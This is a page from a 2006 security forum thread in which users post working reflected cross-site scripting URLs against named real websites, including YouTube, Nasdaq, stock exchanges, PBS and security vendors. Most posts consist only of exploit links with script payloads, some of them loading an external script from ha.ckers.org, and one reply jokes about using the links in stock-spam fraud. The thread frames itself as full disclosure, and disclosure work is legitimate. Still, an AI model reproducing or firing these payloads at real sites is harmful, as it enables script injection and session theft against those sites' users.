Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...678910111213141516...LastNext
Current Page: 11 of 65
Re: So it begins
Posted by: maluc
Date: September 28, 2006 01:46PM

it's also interesting to note that i tested their Web Vulnerability Scanner (that flagship product of theirs) on their own test site for it http://testphp.acunetix.com. It claims to check for XSS as well, but it failed to detect even the most basic <script>alert(/XSS/)</script> injection to it's Search bar .. no breakout required.

So i'm not sure what XSS it's searching for, if it doesn't find the simplest vectors .-.

Edit: i take that back, it does find the XSS .. i thought the test was done, but it's still going ^^. so i really just wonder if they tested it on acunetix.com then..

/*end rant*/

-maluc



Edited 1 time(s). Last edit at 09/28/2006 02:03PM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 01:51PM

The only working XSS scanner that I've found is wapiti, and that only picks up basic strings.

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 28, 2006 01:55PM

I love Google's sense of humour.


Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: September 28, 2006 02:00PM

Look at the 3rd post from the bottom on the prevous page.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: So it begins
Posted by: id
Date: September 28, 2006 02:17PM

Haha, nice catch Kyran

-id

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 03:02PM

http://searchsecurity.techtarget.com/search/1,293876,sid14,00.html?query=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&bucket=ALL
http://search.ittoolbox.com/default.asp?r=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&Submit1=Search
http://shops.ancestry.com/searchresultslist.asp?searchstring=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E



Edited 2 time(s). Last edit at 09/28/2006 04:19PM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 28, 2006 04:11PM

IIRC this thread is about full disclosure, not bashing any products. Even there is a close relationship between both, for some obvious reason, it's unfair to compair both equal, IMHO.

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 28, 2006 04:18PM

Yah, I kinda agree... although the stuff with F5 and Acunetix is funny, it probably belongs in another wall of shame thread. Product bashing in particular is 100% okay as that's how we learn how to fix lots of these problems, but let's keep it in another thread (anywhere else is fine - OMG Ponies or this sub-section). Whoever wants to start it is fine, just let this thread know and we can keep this one on track.

We're on such a good role, I don't want to loose steam.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 28, 2006 04:30PM

Ok. Let's get back on track with another YouTube one.

Via post. http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.youtube.com/categories_portal&c=2&search=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 28, 2006 04:45PM

More drama from Acutenix:

http://www.darkreading.com/document.asp?doc_id=104815

"Tamara Borg, Acutenix's marketing manager, wonders if maybe the hackers had hit the company's honeypots, which are purposely riddled with vulns."

Someone needs to make a movie of it/get Google to index it. Tamara isn't very bright. This is how people get fired - and a great case study on the very worst way to handle disclosures/press.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Kyran
Date: September 28, 2006 04:45PM

http://www.youtube.com/groups_create?group_name=xss%22%3E%3Cscript%3Ealert('xss1')%3C/script%3E&tags=xss2%22%3E%3Cscript%3Ealert('xss2')%3C/script%3E - More YouTube

And to think, months ago when I was starting out, I thought youtube had no XSS holes. I wonder if I was just that ignorant, or just that lazy to not look. Lol.

- Kyran

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 04:53PM

http://www.gesecurity.com/portal/site/GESecurity/template.PAGE/menuitem.5618f8037e6d3a0c8e6e9510c4030730/?javax.portlet.tpst=2080500d1d974fba0c39142cc4030730&javax.portlet.prp_2080500d1d974fba0c39142cc4030730_viewID=MY_PORTAL_VIEW&javax.portlet.begCacheTok=token&javax.portlet.endCacheTok=token&withinQuery1=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.safer-networking.org/index.php?page=search&lang=en&submit=&quickquery=%22%2F%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E&submit.x=0&submit.y=0&submit=%3E - The home of Spybot S&D.

By the way, for anyone that doesn't have it yet, the Live HTTP Headers firefox extention makes things a lot easier.



Edited 2 time(s). Last edit at 09/28/2006 05:02PM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 05:00PM

that works kyran, but you have to be logged in to do so .. which for exploitation, might even be ideal

-maluc



Edited 1 time(s). Last edit at 09/28/2006 05:00PM by maluc.

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 05:20PM

http://www.scmagazine.com/us/search/index.cfm?fuseaction=XCU.Search.Simple&sSearchPhrase=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.jpg+&sSection=ALL&x=0&y=0 - Took me a few tries because it only allows tags if they don't close.

Options: ReplyQuote
Re: So it begins
Posted by: maluc
Date: September 28, 2006 05:25PM

heh, ya it's a good example of a filter that doesn't filter .. but it was posted by RSnake already last month _-_ http://sla.ckers.org/forum/read.php?3,44,738#msg-738 .. and still functional it seems

-maluc

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 28, 2006 09:28PM

http://www.nasdaq.com/portfolio/ptform2.asp?site=&sitesubtype=&email=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&name=&submit=Submit

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 28, 2006 09:43PM

http://www.amex.com/quickquote/error.jsp?fldMessage=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Not American Xxpress but American Stock Exchange.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 28, 2006 09:53PM

Italian Stock Exchange: http://www.borsaitaliana.it/bitApp/login.bit?username=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&password=&submit.x=26&submit.y=14

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 28, 2006 10:00PM

Argh, it's so hard to find forms in some sites, does anyone know of a program that crawls links looking for forms on the site?

Options: ReplyQuote
Re: So it begins
Posted by: rsnake
Date: September 28, 2006 10:21PM

Australian Stock Exchange: http://www.asx.com.au/asx/about/Feedback.jsp?referred='--%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Ghozt, I'm sure you could write one pretty easily using wget and some regex or you could write one by scratch, but that's actually going to miss a lot of things (like the the asx.com.au link above which doesn't use a form to popuplate that information).

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 28, 2006 10:34PM

http://searchsecurity.techtarget.com/search/1,293876,sid14,00.html?query=%27%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&bucket=ALL

The following site use the same search engine from techtarget. (subsitute sub domain for name below)

2020software.com
Bitpipe.com
Expert Answer Center
Search400.com
SearchAppSecurity.com
SearchCIO.com
SearchCRM.com
SearchDataCenter.com
SearchDataManagement.com
SearchDomino.com
SearchExchange.com
SearchMobileComputing.com
SearchNetworking.com
SearchOpenSource.com
SearchOracle.com
SearchSAP.com
SearchSecurity.com
SearchServer-
virtualization.com
SearchSMB.com
SearchSQLServer.com
SearchStorage.com
SearchVB.com
SearchVoIP.com
SearchWebServices.com
SearchWinComputing.com
SearchWindowsSecurity.com
SearchWinIT.com
TheServerSide.NET
TheServerSide.com
Whatis.com

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 09/28/2006 10:37PM by digi7al64.

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 28, 2006 10:42PM

http://www.shop.com/op/aprod-~%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E-k24-g1

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 28, 2006 11:15PM

Although not a big site they have a lot of very important clients using the Search Server product.

http://www.hummingbird.com/SEARCH/search.html?searchText=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E&searchType=Basic&Search.x=0&Search.y=0&Search=Search

Quote

Hummingbird SearchServer is one of the fastest and most reliable full-text search engines on the market. It is the advanced information retrieval platform for high volume, line-of business, Linux, Microsoft Windows, UNIX, and Web applications and is widely used to develop electronic publishing, e-business, customer care, on-line technical support, and many other management solutions.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 12:16AM

http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.usenext.com/UseNextDE/shopInt/obj/user/usShowLostPassword.cfm%3fSNUUID=1&sEmail=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E (usenext.de)
http://morpheus.com/contact.asp?ref=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://sales.limewire.com/support/pro_lookup.php?payer_email=%3Cscript%20src=http://ha.ckers.org/xss.jpg
http://www.downloadsquad.com/search/?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E



Edited 3 time(s). Last edit at 09/29/2006 12:56AM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 29, 2006 12:29AM

http://www.pbs.org/search/search_results.html?q=<script>alert('xss')</script>&neighborhood=none

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: September 29, 2006 12:48AM

http://www.marketwatch.com/news/newsfinder/default.asp?value=%22%3Balert%28%27xss%27%29%3Bs.prop18=%22&property=word&doctype=806&scid=3&ctl25.x=6&ctl25.y=11

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: So it begins
Posted by: Ghozt
Date: September 29, 2006 01:07AM

http://www.tucows.com/search?search_terms=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&search_scope=lin&search_adv=0&search_size=&search_size_multi=b
http://mybittorrent.com/?keywords=<script+src=http://ha.ckers.org/xss.jpg+&cat=&subcat=
http://www.phpnuke.org/modules.php?name=Search&query=%3Cscript+src%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.jpg+&topic=&category=0&author=&days=0&type=stories
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://nukecops.com/modules.php%3fname=Search&query=%253Cscript+src%253Dhttp%253A%252F%252Fha.ckers.org%252Fxss.jpg+&topic=&category=0&author=&days=0&type=stories - heh, Nukecops.



Edited 7 time(s). Last edit at 09/29/2006 02:00AM by Ghozt.

Options: ReplyQuote
Re: So it begins
Posted by: thomaspollet
Date: September 29, 2006 04:05AM

I reported the phpnuke.org xss to them a while ago. Sad they haven't fixed since then.
+ I love the stock market xss: go figure someone spamming about stock xyz skyrocketting, putting xss'ed links to nasdaq etc. on it...profit!

someone coding an xss scanner/fuzzer? I have some ideas on this subject.

Options: ReplyQuote
Re: So it begins
Posted by: kirke
Date: September 29, 2006 04:26AM

> someone coding an xss scanner/fuzzer? I have some ideas on this subject.
hmm, there're countless fuzzers out in the wild, free and comercial ones.
Even acunetix is not that bad, if configured properly :-)
IMHO the scanners itself are not the main problem, just the database they use, or the people using them improper configured, or the time you have to wait for a zillion requests, etc. etc.

But this is all OT in this thread, should open another one in OMG or Projects.

Options: ReplyQuote
Re: So it begins
Posted by: cheng
Date: September 29, 2006 04:31AM

maluc Wrote:
-------------------------------------------------------
> wow, that's a great first post cheng, because i
> honestly didn't know of an auto-executing tag
> property for IE .. it's not auto-executing persay
> .. but it's a mouseover for the entire webpage.
> interesting stuff.
>
> is this a deprecated function for eval? it doesn't
> seem to be well documented anywhere, in
> particular, w3schools makes no mention.
>
> -maluc


'expression()' is collected in XSS Cheat Sheet.
Maybe http://msdn.microsoft.com/library/default.asp?url=/workshop/author/dhtml/reference/methods/setexpression.asp this can give some help.

Options: ReplyQuote
Pages: PreviousFirst...678910111213141516...LastNext
Current Page: 11 of 65


Sorry, only registered users may post in this forum.